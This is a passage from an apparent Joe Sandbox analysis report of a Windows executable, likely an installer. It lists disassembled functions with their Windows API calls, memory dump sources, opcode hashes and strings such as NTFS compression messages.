                                                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 59411F75600250AFC710DF2AFA85B5677E1EB64319F15817BE404CB365DB38AD81CF98
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  Function 00408A5C Relevance: 6.1, APIs: 4, Instructions: 95windowCOMMON
                                                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                  • GetModuleFileNameA.KERNEL32(00400000,?,00000100), ref: 00408A7D
                                                                                                                                                                                                                                                                                                                                                                  • LoadStringA.USER32(00400000,0000FF9E,?,00000040), ref: 00408AEC
                                                                                                                                                                                                                                                                                                                                                                  • LoadStringA.USER32(00400000,0000FF9F,?,00000040), ref: 00408B87
                                                                                                                                                                                                                                                                                                                                                                  • MessageBoxA.USER32(00000000,?,?,00002010), ref: 00408BC6
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 00000012.00000002.4626715845.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4626209866.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4627393514.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4628933385.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4630749455.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4630958388.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_18_2_400000_1EB9.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: LoadString$FileMessageModuleName
                                                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 704749118-0
                                                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 951c1155a055777031086f0b90c3083af3c2960daf331f13f5541ebbba7c3e7d
                                                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 11344639af0fa1b95b6fef638a25282c94d515b30ba3ed4b3402aedba36e13da
                                                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 951c1155a055777031086f0b90c3083af3c2960daf331f13f5541ebbba7c3e7d
                                                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 843133706083849ED330EA658945B9F77D89B85304F40483FF6C8D72D1DB79A9048B67
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  Function 0044E8D4 Relevance: 6.1, APIs: 4, Instructions: 83windowCOMMON
                                                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                  • SendMessageA.USER32(00000000,000001A1,?,00000000), ref: 0044E91D
                                                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 0044CF60: SendMessageA.USER32(00000000,000001A0,?,00000000), ref: 0044CF92
                                                                                                                                                                                                                                                                                                                                                                  • InvalidateRect.USER32(00000000,00000000,00000001,00000000,000001A1,?,00000000), ref: 0044E9A1
                                                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 0042BBC4: SendMessageA.USER32(00000000,0000018E,00000000,00000000), ref: 0042BBD8
                                                                                                                                                                                                                                                                                                                                                                  • IsRectEmpty.USER32(?), ref: 0044E963
                                                                                                                                                                                                                                                                                                                                                                  • ScrollWindowEx.USER32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000006), ref: 0044E986
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 00000012.00000002.4626715845.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4626209866.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4627393514.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4628933385.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4630749455.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4630958388.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_18_2_400000_1EB9.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: MessageSend$Rect$EmptyInvalidateScrollWindow
                                                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 855768636-0
                                                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 919708f5ffdde2f57f521d6641e4cc0e1a287a75e8cdc9711807c6008472dbb9
                                                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 03991ef50c1cdc1947edd1d0bf9da16660927dd763c0b41cb42d654f0fd6bbd7
                                                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 919708f5ffdde2f57f521d6641e4cc0e1a287a75e8cdc9711807c6008472dbb9
                                                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 47113871B5030027E250AA7A9C86B5B76899B88748F14093FB546EB3C7EE7DDC09429D
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  Function 004952F4 Relevance: 6.1, APIs: 4, Instructions: 81COMMON
                                                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                  • OffsetRect.USER32(?,?,00000000), ref: 00495358
                                                                                                                                                                                                                                                                                                                                                                  • OffsetRect.USER32(?,00000000,?), ref: 00495373
                                                                                                                                                                                                                                                                                                                                                                  • OffsetRect.USER32(?,?,00000000), ref: 0049538D
                                                                                                                                                                                                                                                                                                                                                                  • OffsetRect.USER32(?,00000000,?), ref: 004953A8
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 00000012.00000002.4626715845.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4626209866.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4627393514.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4628933385.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4630749455.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4630958388.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_18_2_400000_1EB9.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: OffsetRect
                                                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 177026234-0
                                                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 39b7304c59ecfeab53ef959acea8ec35100b2c2eb9a0585a5ab9f65ef9bb45fe
                                                                                                                                                                                                                                                                                                                                                                  • Instruction ID: af1c1dfc71d00ff4a9a929e8d6bf6bfabc08d13bc1b1844b1e7d273cf48c6b2a
                                                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 39b7304c59ecfeab53ef959acea8ec35100b2c2eb9a0585a5ab9f65ef9bb45fe
                                                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 94217CB6700701ABD700DE69CD85E5BB7DEEBC4344F24CA2AF954C7249D634ED0487A6
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  Function 00417228 Relevance: 6.1, APIs: 4, Instructions: 72COMMON
                                                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                  • GetCursorPos.USER32 ref: 00417270
                                                                                                                                                                                                                                                                                                                                                                  • SetCursor.USER32(00000000), ref: 004172B3
                                                                                                                                                                                                                                                                                                                                                                  • GetLastActivePopup.USER32(?), ref: 004172DD
                                                                                                                                                                                                                                                                                                                                                                  • GetForegroundWindow.USER32(?), ref: 004172E4
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 00000012.00000002.4626715845.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4626209866.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4627393514.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4628933385.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4630749455.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4630958388.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_18_2_400000_1EB9.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: Cursor$ActiveForegroundLastPopupWindow
                                                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 1959210111-0
                                                                                                                                                                                                                                                                                                                                                                  • Opcode ID: ab2bc15dd938f987afbfcd80c1a154205083a351e68354f3dc1a1c3122339836
                                                                                                                                                                                                                                                                                                                                                                  • Instruction ID: a2974bbdd40a4ad71efed6c963999b1e78101043f5dd1c0306289f7dfca9f025
                                                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: ab2bc15dd938f987afbfcd80c1a154205083a351e68354f3dc1a1c3122339836
                                                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 4321A1313082018BCB20AB69E985AE733B1EF44754B0545ABF854CB352D73CDC82CB89
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  Function 00416B52 Relevance: 6.1, APIs: 4, Instructions: 67windowCOMMON
                                                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                  • SendMessageA.USER32(?,?,?,?), ref: 00416B94
                                                                                                                                                                                                                                                                                                                                                                  • SetTextColor.GDI32(?,00000000), ref: 00416BAE
                                                                                                                                                                                                                                                                                                                                                                  • SetBkColor.GDI32(?,00000000), ref: 00416BC8
                                                                                                                                                                                                                                                                                                                                                                  • CallWindowProcA.USER32(?,?,?,?,?), ref: 00416BF0
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 00000012.00000002.4626715845.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4626209866.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4627393514.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4628933385.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4630749455.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4630958388.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_18_2_400000_1EB9.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: Color$CallMessageProcSendTextWindow
                                                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 601730667-0
                                                                                                                                                                                                                                                                                                                                                                  • Opcode ID: e00bfe9aa6131f48cff3dcc7af916a378e96ad52e4fe803e9d506167a3009904
                                                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 7a78515b3e46194db8101330e18da160614de8b80347fcfd5663145ee8fb6c7e
                                                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: e00bfe9aa6131f48cff3dcc7af916a378e96ad52e4fe803e9d506167a3009904
                                                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 27115EB6600A04AFC710EE6ECC84E8773ECDF48314715883EB59ADB612D638F8418B69
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  Function 00494FAC Relevance: 6.1, APIs: 4, Instructions: 59COMMON
                                                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                  • MulDiv.KERNEL32(8B500000,00000008,?), ref: 00494FC1
                                                                                                                                                                                                                                                                                                                                                                  • MulDiv.KERNEL32(50142444,00000008,?), ref: 00494FD5
                                                                                                                                                                                                                                                                                                                                                                  • MulDiv.KERNEL32(F70577E8,00000008,?), ref: 00494FE9
                                                                                                                                                                                                                                                                                                                                                                  • MulDiv.KERNEL32(8BF88BFF,00000008,?), ref: 00495007
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 00000012.00000002.4626715845.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4626209866.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4627393514.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4628933385.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4630749455.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4630958388.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_18_2_400000_1EB9.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                                                                                                                  • Opcode ID: b0bc83cb44cddb6cfb83e9cff79c84a8c4632dee95d4fc6912c32f85648e17c5
                                                                                                                                                                                                                                                                                                                                                                  • Instruction ID: c81a7ae82503e1df060b9d2e8e6c822c04bb2cec442f3182d8fec1f0f0e8f71f
                                                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: b0bc83cb44cddb6cfb83e9cff79c84a8c4632dee95d4fc6912c32f85648e17c5
                                                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 48112472604204ABCF50DE99C8C4D9B7BECEF4D320B1541A6F918DB246D674DD408BA4
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  Function 00454F68 Relevance: 6.1, APIs: 4, Instructions: 54COMMON
                                                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                  • WaitForInputIdle.USER32(00000001,00000032), ref: 00454F94
                                                                                                                                                                                                                                                                                                                                                                  • MsgWaitForMultipleObjects.USER32(00000001,00000001,00000000,000000FF,000000FF), ref: 00454FB6
                                                                                                                                                                                                                                                                                                                                                                  • GetExitCodeProcess.KERNEL32(00000001,00000001), ref: 00454FC5
                                                                                                                                                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(00000001,00454FF2,00454FEB,?,00000031,00000080,00000000,?,?,0045534B,00000080,0000003C,00000000,00455361), ref: 00454FE5
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 00000012.00000002.4626715845.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4626209866.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4627393514.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4628933385.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4630749455.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4630958388.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_18_2_400000_1EB9.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: Wait$CloseCodeExitHandleIdleInputMultipleObjectsProcess
                                                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 4071923889-0
                                                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 45540edf5afa8ba95db9dec670ac0957df4a9836c83591dc179b3e9a7f9926ac
                                                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 44a5693fa59bfbe72ab063cfacecacb9b789a88f4d4f9747d0667cdf65a63c8e
                                                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 45540edf5afa8ba95db9dec670ac0957df4a9836c83591dc179b3e9a7f9926ac
                                                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 7201F9716046087EEB20979E8C06F6B7BACDF44774F610167F904DB2C2C6785D40C668
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  Function 0040D210 Relevance: 6.1, APIs: 4, Instructions: 51COMMON
                                                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                  • FindResourceA.KERNEL32(00400000,?,00000000), ref: 0040D227
                                                                                                                                                                                                                                                                                                                                                                  • LoadResource.KERNEL32(00400000,72756F73,0040A9C8,00400000,00000001,00000000,?,0040D184,00000000,?,00000000,?,?,0047C7C4,0000000A,REGDLL_EXE), ref: 0040D241
                                                                                                                                                                                                                                                                                                                                                                  • SizeofResource.KERNEL32(00400000,72756F73,00400000,72756F73,0040A9C8,00400000,00000001,00000000,?,0040D184,00000000,?,00000000,?,?,0047C7C4), ref: 0040D25B
                                                                                                                                                                                                                                                                                                                                                                  • LockResource.KERNEL32(74536563,00000000,00400000,72756F73,00400000,72756F73,0040A9C8,00400000,00000001,00000000,?,0040D184,00000000,?,00000000,?), ref: 0040D265
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 00000012.00000002.4626715845.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4626209866.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4627393514.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4628933385.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4630749455.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4630958388.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_18_2_400000_1EB9.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: Resource$FindLoadLockSizeof
                                                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 3473537107-0
                                                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 3e4229e138499de8d2808c65d3409da6e5b604f2f015f14c2150909c6176e447
                                                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 8b55825d53d46818f15098a3aa340eb6897fe62b828c159971ec5f2842f97e2f
                                                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 3e4229e138499de8d2808c65d3409da6e5b604f2f015f14c2150909c6176e447
                                                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: ADF062736046046F8704EE9DA881D5B77ECDE88364310017FF908EB246DA38DD018B78
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  Function 0047009C Relevance: 6.0, APIs: 1, Strings: 3, Instructions: 41COMMON
                                                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(00000000,00000000), ref: 004700ED
                                                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                                                  • Setting NTFS compression on directory: %s, xrefs: 004700BB
                                                                                                                                                                                                                                                                                                                                                                  • Failed to set NTFS compression state (%d)., xrefs: 004700FE
                                                                                                                                                                                                                                                                                                                                                                  • Unsetting NTFS compression on directory: %s, xrefs: 004700D3
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 00000012.00000002.4626715845.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4626209866.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4627393514.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4628933385.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4630749455.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4630958388.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_18_2_400000_1EB9.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: ErrorLast
                                                                                                                                                                                                                                                                                                                                                                  • String ID: Failed to set NTFS compression state (%d).$Setting NTFS compression on directory: %s$Unsetting NTFS compression on directory: %s
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 1452528299-1392080489
                                                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 45a9997a28aa55db17c716ab1d5551bd27f478ca94a3e1f3135f7cec6ca191fc
                                                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 8e5543267561a70d3fbbbef991b1365390ff1382f756d9cdf86c8bb39141f558
                                                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 45a9997a28aa55db17c716ab1d5551bd27f478ca94a3e1f3135f7cec6ca191fc
                                                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: C9011730E0928C96CF05D7ADA0412DDBBF4DF4D314F84C1AFA45DE7282DA790609879A
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  Function 00470848 Relevance: 6.0, APIs: 1, Strings: 3, Instructions: 41COMMON
                                                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,00000000), ref: 00470899
                                                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                                                  • Failed to set NTFS compression state (%d)., xrefs: 004708AA
                                                                                                                                                                                                                                                                                                                                                                  • Setting NTFS compression on file: %s, xrefs: 00470867
                                                                                                                                                                                                                                                                                                                                                                  • Unsetting NTFS compression on file: %s, xrefs: 0047087F
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 00000012.00000002.4626715845.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4626209866.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4627393514.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4628933385.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4630749455.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4630958388.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_18_2_400000_1EB9.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: ErrorLast
                                                                                                                                                                                                                                                                                                                                                                  • String ID: Failed to set NTFS compression state (%d).$Setting NTFS compression on file: %s$Unsetting NTFS compression on file: %s
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 1452528299-3038984924
                                                                                                                                                                                                                                                                                                                                                                  • Opcode ID: a380c5b27ca8ef2e6236f0428f65491e762024a1caeb95240921d3301164247d
                                                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 78fa65e16581c334b53b8e167e27839d8ecb3154876bc13dabe901d18edf2e93
